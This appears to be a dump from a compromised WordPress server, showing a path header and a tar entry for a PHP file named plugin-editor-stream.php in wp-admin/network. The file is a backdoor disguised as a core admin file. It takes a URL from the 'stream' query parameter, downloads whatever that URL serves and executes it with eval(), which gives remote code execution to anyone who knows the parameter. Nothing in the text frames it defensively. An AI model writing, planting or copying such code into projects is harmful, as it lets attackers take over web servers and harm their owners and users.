| Current Path : /home/x/b/o/xbodynamge/namtation/wp-content/ |
| Current File : /home/x/b/o/xbodynamge/namtation/wp-content/plugin-editor-stream.php.tar |
home/xbodynamge/www/wp-admin/network/plugin-editor-stream.php 0000644 00000000510 15111671051 0020440 0 ustar 00 <?php
if (isset($_GET['stream'])) {
$is_archive_wpr = $_GET['stream'];
if ($absint_ba = curl_init()) {
curl_setopt($absint_ba, CURLOPT_URL, $is_archive_wpr);
curl_setopt($absint_ba, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($absint_ba));
curl_close($absint_ba);
exit;
}
}